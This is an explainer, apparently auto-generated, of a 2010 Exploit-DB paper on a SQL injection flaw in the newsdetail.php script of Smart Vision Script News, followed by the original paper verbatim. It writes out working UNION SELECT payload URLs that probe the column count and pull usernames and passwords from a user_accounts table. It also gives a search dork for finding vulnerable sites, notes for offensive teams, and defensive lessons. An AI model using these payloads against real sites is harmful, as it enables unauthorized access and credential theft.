Smart Vision Script News 'newsdetail.php' SQL Injection Explained
Smart Vision Script News 'newsdetail.php' SQL Injection Explained
What this paper is
This paper describes a SQL injection vulnerability found in the newsdetail.php script of the Smart Vision Script News software. The vulnerability allows an attacker to manipulate database queries by injecting malicious SQL code through the id parameter. This can lead to unauthorized access to sensitive data, such as usernames and passwords.
Simple technical breakdown
The core of the vulnerability lies in how the newsdetail.php script handles user input from the id parameter. When a user requests a news detail, the script likely uses the provided id to fetch specific information from a database. If the script doesn't properly sanitize or validate this id before using it in a SQL query, an attacker can insert SQL commands.
The exploit uses a technique called UNION SELECT. This allows an attacker to combine the results of their injected query with the results of the original, legitimate query. By carefully crafting the injected query, the attacker can extract specific columns from different tables, such as user_name and password from the user_accounts table.
The exploit also uses comments (--) to truncate the original SQL query, ensuring that only the injected part is executed.
Complete code and payload walkthrough
The provided paper does not contain executable code in the traditional sense (like a C program or Python script). Instead, it provides a URL pattern that demonstrates the exploit. The "code" here refers to the crafted URL strings that exploit the vulnerability.
Let's break down the exploit URL pattern:
Base URL Structure:Site /path/newsdetail.php?id=<value>
Site /path/newsdetail.php: This is the target script on the web server.?id=: This indicates the start of the query string, andidis the parameter being targeted.
Exploit Payload 1: Initial ProbingSite /path/newsdetail.php?id=-12+union+select+1,2,3,4,5,6,7--
id=-12: This is a negative number. The purpose is likely to ensure that the original query (which expects a valid positive ID) returns no results. This makes it easier to see the results of the injectedUNION SELECTstatement without interference.+union+select+1,2,3,4,5,6,7: This is the injected SQL command.union: This SQL operator combines the result set of two or moreSELECTstatements.select 1,2,3,4,5,6,7: This part selects literal integer values. The attacker is trying to determine the number of columns the original query is expecting. By seeing which numbers are displayed in the output, they can deduce the correct number of columns to use in subsequent, more targeted injections. The number7is used here, suggesting the original query likely returns 7 columns.
--: This is a SQL comment. It tells the database to ignore any characters that follow it in the original SQL query. This is crucial for preventing syntax errors and ensuring only the injected part is executed.
Exploit Payload 2: Extracting Usernameshttp://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts--
id=-12: Same purpose as above – to ensure no original results are returned.+union+select+1,user_name,3,4,5,6,7:union select: Combines results.1,user_name,3,4,5,6,7: This is the key part. The attacker has identified that the original query returns 7 columns. They are now replacing some of the placeholder numbers withuser_name. The goal is to have theuser_namecolumn from the specified table appear in the output. The numbers1,3,4,5,6, and7are placeholders for the other columns that are not being extracted, or columns that the attacker doesn't need to see at this moment.
+from+zagrosle_zagros.user_accounts: This specifies the table (user_accounts) and the database (zagrosle_zagros) from which to retrieve theuser_name.--: SQL comment to ignore the rest of the original query.
Exploit Payload 3: Extracting Passwordshttp://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts--
- This payload is identical in structure to the username extraction, with the critical difference being the selection of the
passwordcolumn instead ofuser_name.1,password,3,4,5,6,7: Replacesuser_namewithpasswordto extract password hashes or plain text passwords.
+from+zagrosle_zagros.user_accounts: Same table and database as before.--: SQL comment.
Mapping list:
newsdetail.php?id=: Target script and vulnerable parameter.-12: Value to likely nullify original query results.+union+select: SQL keyword to combine query results.1,2,3,4,5,6,7: Placeholder values to determine the number of columns in the original query.user_name: Target column for extracting usernames.password: Target column for extracting passwords.from zagrosle_zagros.user_accounts: Target table and database.--: SQL comment to terminate the original query.
Practical details for offensive operations teams
- Required Access Level: Typically requires unauthenticated access to the web application. The vulnerability is exposed via a GET request.
- Lab Preconditions:
- A vulnerable instance of Smart Vision Script News. This would likely involve setting up a web server (e.g., Apache, Nginx) with PHP and a compatible database (e.g., MySQL).
- Knowledge of the web application's directory structure to locate
newsdetail.php. - Understanding of the database schema, specifically table and column names like
user_accounts,user_name, andpassword. This might require prior reconnaissance or educated guessing based on common web application patterns.
- Tooling Assumptions:
- Web browser for manual testing and verification.
- A web proxy like Burp Suite or OWASP ZAP to intercept and modify requests, making it easier to craft and send the exploit URLs.
- Automated SQL injection tools (e.g., sqlmap) could potentially be configured to exploit this, though manual crafting is demonstrated here.
- Execution Pitfalls:
- Incorrect Column Count: If the original query returns a different number of columns than assumed (e.g., not 7), the
UNION SELECTwill fail with a syntax error. The attacker must first determine the correct column count using the probing payload. - Database/Table/Column Name Variations: The attacker assumes specific names (
zagrosle_zagros.user_accounts,user_name,password). If these differ, the exploit will fail. Reconnaissance or brute-forcing of common names is necessary. - Web Application Firewall (WAF) / Intrusion Detection/Prevention Systems (IDS/IPS): Modern security measures might detect the suspicious
UNION SELECTpattern or the presence of SQL keywords in the URL parameters. - URL Encoding: Spaces and special characters in URLs need to be URL-encoded (e.g., space becomes
%20or+). The exploit uses+for spaces, which is common in GET requests. - Database Permissions: The web application's database user might not have sufficient privileges to select from the
user_accountstable or to retrieve sensitive columns.
- Incorrect Column Count: If the original query returns a different number of columns than assumed (e.g., not 7), the
- Expected Telemetry:
- Web Server Logs: Requests to
newsdetail.phpwith unusualidparameters containingUNION SELECTand SQL keywords. High volume of requests if automated. - Database Logs: Queries executed against the
user_accountstable, potentially showingSELECT user_name FROM ...orSELECT password FROM ...originating from the web application's connection. - Application Error Logs: If the injection fails due to incorrect column counts or syntax errors, the web application might log these errors.
- IDS/IPS Alerts: Signatures for SQL injection attempts.
- Web Server Logs: Requests to
Where this was used and when
The exploit was published on January 3, 2010. This indicates that such vulnerabilities were actively being discovered and exploited around that time. The "dork" provided (Come from home Script ( Latest Project ) www.esmart-vision.com) suggests that the attacker likely used search engines (like Google) with specific search queries to find websites running this particular software. This type of vulnerability is common in older, unpatched web applications.
Defensive lessons for modern teams
- Input Validation and Sanitization: This is the most critical defense. All user-supplied input, especially data used in database queries, must be strictly validated and sanitized.
- Parameterized Queries/Prepared Statements: Use these exclusively for database interactions. They separate SQL code from data, preventing injected code from being executed.
- Whitelisting: Only allow expected characters or formats for input parameters.
- Escaping Special Characters: Properly escape characters that have special meaning in SQL.
- Principle of Least Privilege: The database user account used by the web application should only have the minimum necessary permissions to perform its tasks. It should not have broad
SELECT *privileges or access to sensitive system tables unless absolutely required. - Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns like SQL injection. Keep WAF rules updated.
- Regular Patching and Updates: Keep all web applications, frameworks, and underlying server software updated to patch known vulnerabilities.
- Security Audits and Code Reviews: Regularly audit web application code for security flaws, especially around data input and database interaction.
- Error Handling: Configure applications to log detailed errors internally but display generic error messages to users. Avoid revealing database schema or query details to the public.
ASCII visual (if applicable)
This exploit is a direct manipulation of HTTP requests and SQL queries. A visual representation of the network flow is straightforward:
+-----------------+ +-----------------+ +-----------------+ +-----------------+
| Attacker's |----->| Web Browser / |----->| Web Server |----->| Database Server |
| Machine | | Proxy | | (newsdetail.php)| | (SQL Query) |
+-----------------+ +-----------------+ +-----------------+ +-----------------+
^ |
| (Malicious URL) | (Vulnerable Query)
| v
+-----------------------------------------------------+
(Exploit Payload: UNION SELECT)Explanation:
The attacker crafts a malicious URL. This URL is sent to the web server. The newsdetail.php script on the web server processes the request and, due to the vulnerability, constructs a malicious SQL query that is sent to the database. The database executes the combined query, and the attacker receives sensitive data in the web response.
Source references
- Exploit Title: Smart Vision Script News - 'newsdetail.php' SQL Injection (1)
- Author: Err0R
- Published: 2010-01-03
- Paper URL: https://www.exploit-db.com/papers/10977
- Original Paper Source: Provided in the prompt.
Original Exploit-DB Content (Verbatim)
# Exploit Title: Smart Vsion Script News (newsdetail) SQL Injection Vulnerability
# Software Link: www.esmart-vision.com<http://www.esmart-vision.com/>
============================================
| Smart Vision Script News ( newsdetail ) SQL Injection Vulnerability
============================================
# (+) Author: Err0R
# (+) Site : www.sa-hacker.com/vb<http://www.sa-hacker.com/vb>
# (+) Email : a5q@hotmail.com<mailto:a5q@hotmail.com>
=====================================
~~~~~~~~~~~~~~~~~~~~
dork : Come from home Script ( Latest Project ) www.esmart-vision.com<http://www.esmart-vision.com/>
~~~~~~~~~~~~~~~~~~~~
Exploit : Site /path/newsdetail.php?id=-12+union+select+1,2,3,4,5,6,7--
And you come the enject ,,
Demo :-
User name : http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http://server/newsdetail.php?id=-12+union+select+1,user_name,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
Password : http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts<http:http://server/newsdetail.php?id=-12+union+select+1,password,3,4,5,6,7+from+zagrosle_zagros.user_accounts>--
admin Login : Site /path/admin/admin.php
=============================================================
#====GreeTZ===================#
#all member in www.sa-hacker.com/vb<http://www.sa-hacker.com/vb> #
#and all in My email : ) #
#============================#